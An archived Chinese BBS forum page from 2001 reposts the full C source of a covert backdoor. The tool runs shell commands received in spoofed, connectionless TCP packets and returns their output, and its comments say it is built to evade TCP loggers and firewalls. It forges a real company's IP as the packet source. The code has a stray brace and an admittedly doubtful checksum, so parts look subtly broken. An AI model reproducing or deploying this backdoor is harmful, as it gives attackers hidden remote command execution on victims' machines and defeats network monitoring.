368.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="311.htm">上一层</a>][<a href="369.htm">下一篇</a>]
<hr><p align="left"><small>发信人: scz (小四), 信区: Security WWW-POST <br>
标  题: 一个很不错的想法(tcp后门) <br>
发信站: 武汉白云黄鹤站 (Wed May 23 10:33:10 2001) , 转信 <br>
  <br>
以前只想着icmp tunnel了。 <br>
  <br>
/* Backdoor over non connected and spoofed tcp packets <br>
 * Coded by |CyRaX| <br>
 * Members Of Packets Knights Crew <br>
 * www.programmazione.it/knights <br>
 * This little backdoor works by sending data in tcp packets over tcp <br>
packets <br>
 * without creating a connection. Simply we use the tcp that is a connection <br>
 * oriented protocol as udp (connection less). <br>
 * Why to do this : <br>
 *  - tcp loggers simpy log only the connection request <br>
 *  - firewalls can't block packets all the packets destinated to a port >= <br>
 *    1024.. they logs only the packets with the SYN flag... but we don't <br>
 *    need it :) <br>
 * Why this is better than backdoor over icmp or igmp : because a good admin <br>
 * would simply blocks (or at least log) all those packets. But it's very <br>
hard <br>
 * that he'll blocks all the tcp packets (or log them all) <br>

 * Edit this code as you want (and correct all the bugs :P) <br>
*/ <br>
  <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <sys/socket.h> <br>
#include <netinet/tcp.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/in.h> <br>
#include <sys/ioctl.h> <br>
#include <sys/types.h> <br>
#include <net/if.h> <br>
  <br>
/* USER SETUP <br>
 * ports must be the same in the client and the server <br>
 */ <br>
#define CLIENTPORT 1234 <br>
#define SERVERPORT 4321 <br>
  <br>
 /* Prototipi */ <br>
void uso(); <br>
void waitpkt(); <br>

void sendpkt(char *what, unsigned long int to); <br>
u_short in_chksum(u_short *ptr, int nbytes); <br>
/* Globals: */ <br>
int server=0; <br>
char victim[20]; <br>
int wait=1; <br>
int sock_waiting; <br>
char ourip[200]; <br>
  <br>
/* some structs */ <br>
struct ippkt{ <br>
   struct ip ip; <br>
   struct tcphdr tcp; <br>
   char something[12]; <br>
   char data[1024]; <br>
}; <br>
  <br>
struct pseudohdr { <br>
   u_int32_t saddr; <br>
   u_int32_t daddr; <br>
   u_int8_t zero; <br>
   u_int8_t protocol; <br>

   u_int16_t lenght; <br>
}; <br>
  <br>
/* Let's go !! :) */ <br>
  <br>
int main(int argc, char **argv){ <br>
   pid_t procid; <br>
   struct ippkt pkt; <br>
   char command[200]; <br>
  <br>
  <br>
   srand(getpid()); <br>
   if(argc<2){ <br>
      uso(); <br>
      exit(0); <br>
   } <br>
   if (strstr(argv[1],"-s")){ <br>
      server=1; <br>
   } <br>
   else { <br>
      strcpy(victim,argv[2]); <br>
      strcpy(ourip,argv[3]); <br>

   } <br>
   sock_waiting=socket(AF_INET,SOCK_RAW,6); <br>
   printf("Backdoor on non connected/spoofed tcp. Coded by |CyRaX|. <br>
cyrax@freemail.it\n"); <br>
   printf("Members of Packets Knights Crew ! <br>
www.programmazione.it/knights\n"); <br>
   if(server){ <br>
      printf("Running in server mode. Forking and waiting for the data\n"); <br>
      procid=fork(); <br>
      if(procid!=0){ <br>
  /* The parent dies. */ <br>
  exit(0); <br>
      } <br>
      while(1){ <br>
  waitpkt(); <br>
      } <br>
   } <br>
   else { <br>
      printf("Running in client mode. Sending data to %s.\n",victim); <br>
      while(1){ <br>
  printf("root@fucked.%s # ",victim); <br>
  fgets(command,200,stdin); <br>

  wait=1; <br>
  sendpkt(command,inet_addr(victim)); <br>
  while(wait){ <br>
     waitpkt(); <br>
  } <br>
      } <br>
  <br>
  <br>
   } <br>
  <br>
} <br>
  <br>
/* Functions that wait for packets */ <br>
void waitpkt(){ <br>
   struct ippkt pkt; <br>
   int howmany; <br>
   struct sockaddr_in sin; <br>
   int clen=sizeof(sin); <br>
   FILE *job; <br>
   char buff[200]; <br>
   memset(&pkt,0,sizeof(struct ippkt)); <br>
   howmany=recvfrom(sock_waiting,(struct ippkt *) &pkt,sizeof(pkt),0,(struct <br>

sockaddr *)&sin,&clen); <br>
   if(ntohs(pkt.tcp.dest)==SERVERPORT && pkt.tcp.ack==0 && <br>
pkt.tcp.urg==0&&server){ <br>
      job=popen(pkt.data,"r"); <br>
      while(fgets(buff,199,job)!=0){ <br>
  sendpkt(buff,pkt.tcp.seq); <br>
      } <br>
      strcpy(buff,"END_OF_PROCESS"); <br>
      pclose(job); <br>
      sendpkt(buff,pkt.tcp.seq); <br>
   } <br>
   if(ntohs(pkt.tcp.dest)==CLIENTPORT && pkt.tcp.ack==0 && <br>
pkt.tcp.urg==0&&!server){ <br>
      wait=1; <br>
      if(strstr(pkt.data,"END_OF_PROCESS")){ <br>
  wait=0; <br>
      } <br>
      else{ <br>
  printf("%s",pkt.data); <br>
      } <br>
   } <br>
  <br>
  <br>
} <br>
  <br>
/* Functions that sends packets */ <br>
  <br>
void sendpkt(char *what, unsigned long int to){ <br>
   int sock; <br>
   struct sockaddr_in from,temp; <br>
   struct ippkt pkt; <br>
   int hincl=1; <br>
   int err; <br>
   int s; <br>
   struct ifreq ifr; <br>
   struct pseudohdr psd; <br>
   char *tosum; <br>
  <br>
  <br>
   sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW); <br>
   memset(&pkt,0,sizeof(pkt)); <br>
   setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&hincl,sizeof(hincl)); <br>
   from.sin_addr.s_addr=to; <br>
   from.sin_family=AF_INET; <br>
   pkt.ip.ip_len=sizeof(struct ip)+sizeof(struct tcphdr)+12+strlen(what); <br>

   pkt.ip.ip_hl=sizeof(pkt.ip)>>2; <br>
   pkt.ip.ip_v=4; <br>
   pkt.ip.ip_ttl=255; <br>
   pkt.ip.ip_tos=0; <br>
   pkt.ip.ip_off=0; <br>
   pkt.ip.ip_id=htons((int)rand()); <br>
   pkt.ip.ip_p=6; <br>
   /* from www.microsoft.com .. you BETTER change this */ <br>
   pkt.ip.ip_src.s_addr=inet_addr("207.46.131.137"); <br>
   pkt.ip.ip_dst.s_addr=to; <br>
   pkt.ip.ip_sum=in_chksum((u_short *) &pkt.ip,sizeof(struct ip)); <br>
   if(server){ <br>
      pkt.tcp.source=htons(SERVERPORT); <br>
      pkt.tcp.dest=htons(CLIENTPORT); <br>
   } <br>
   else{ <br>
      pkt.tcp.source=htons(CLIENTPORT); <br>
      pkt.tcp.dest=htons(SERVERPORT); <br>
   } <br>
   if(server){ <br>
      pkt.tcp.seq=666; <br>
   } <br>
   } <br>
   else{ <br>
      pkt.tcp.seq=inet_addr(ourip); <br>
  <br>
   } <br>
   /* SOME FLAGS */ <br>
   pkt.tcp.ack=0; <br>
   pkt.tcp.urg=0; <br>
   pkt.tcp.window=1234; <br>
  <br>
   strcpy(pkt.data,what); <br>
   pkt.tcp.urg_ptr=1234; <br>
   /* MAYBE SOMETHING IS WRONG HERE */ <br>
   tosum=malloc(sizeof(psd)+sizeof(pkt.tcp)); <br>
   memcpy(&psd.saddr,&pkt.ip.ip_src.s_addr,4); <br>
   memcpy(&psd.daddr,&pkt.ip.ip_dst.s_addr,4); <br>
   psd.protocol=6; <br>
   psd.lenght=htons(sizeof(struct tcphdr)+12+strlen(what)); <br>
   memcpy(tosum,&psd,sizeof(psd)); <br>
   memcpy(tosum+sizeof(psd),&pkt.tcp,sizeof(pkt.tcp)); <br>
   pkt.tcp.check=in_chksum((u_short *)&tosum,sizeof(psd)+sizeof(pkt.tcp)); <br>
   /* PACKET READY TO GO !!!!!! */ <br>
   err=sendto(sock,&pkt,sizeof(struct ip)+sizeof(struct <br>

tcphdr)+sizeof(pkt.something)+strlen(what), <br>
       0,(struct sockaddr *)&from,sizeof(struct sockaddr)); <br>
} <br>
  <br>
/* Function for the cksum.. ripped */ <br>
  <br>
u_short in_chksum(u_short *ptr, int nbytes) <br>
{ <br>
  register long           sum;            /* assumes long == 32 bits */ <br>
  u_short                 oddbyte; <br>
  register u_short        answer;         /* assumes u_short == 16 bits */ <br>
  <br>
  /* <br>
   * Our algorithm is simple, using a 32-bit accumulator (sum), <br>
   * we add sequential 16-bit words to it, and at the end, fold back <br>
   * all the carry bits from the top 16 bits into the lower 16 bits. <br>
   */ <br>
  <br>
  sum = 0; <br>
  while (nbytes > 1) <br>
  { <br>
    sum += *ptr++; <br>

    nbytes -= 2; <br>
  } <br>
  <br>
        /* mop up an odd byte, if necessary */ <br>
  if (nbytes == 1) <br>
  { <br>
    oddbyte = 0;            /* make sure top half is zero */ <br>
    *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */ <br>
    sum += oddbyte; <br>
  } <br>
  <br>
  /* <br>
   * Add back carry outs from top 16 bits to low 16 bits. <br>
   */ <br>
  <br>
  sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */ <br>
  sum += (sum >> 16);                     /* add carry */ <br>
  answer = ~sum;          /* ones-complement, then truncate to 16 bits */ <br>
  <br>
  return((u_short) answer); <br>
} <br>
  <br>

  <br>
void uso(){ <br>
   printf("Backdoor On Non Connected And Spoofed Tcp Packets\n"); <br>
   printf("Coded by |CyRaX| cyrax@freemail.it - |CyRaX|@ircnet\n"); <br>
   printf("Member Of Packets Knights Crew ! <br>
www.programmazione.it/knights\n"); <br>
   printf("Usage:   server    ./tcpb -s\n"); <br>
   printf("         client    ./tcpb -c <serverip> <your_ip>\n"); <br>
   printf("example : ./tcpb -s ; /tcpb -c 127.0.0.1 127.0.0.1\n"); <br>
  <br>
   exit(0); <br>
} <br>
  <br>
  <br>
  <br>
  <br>
  <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="311.htm">上一层</a>][<a href="369.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>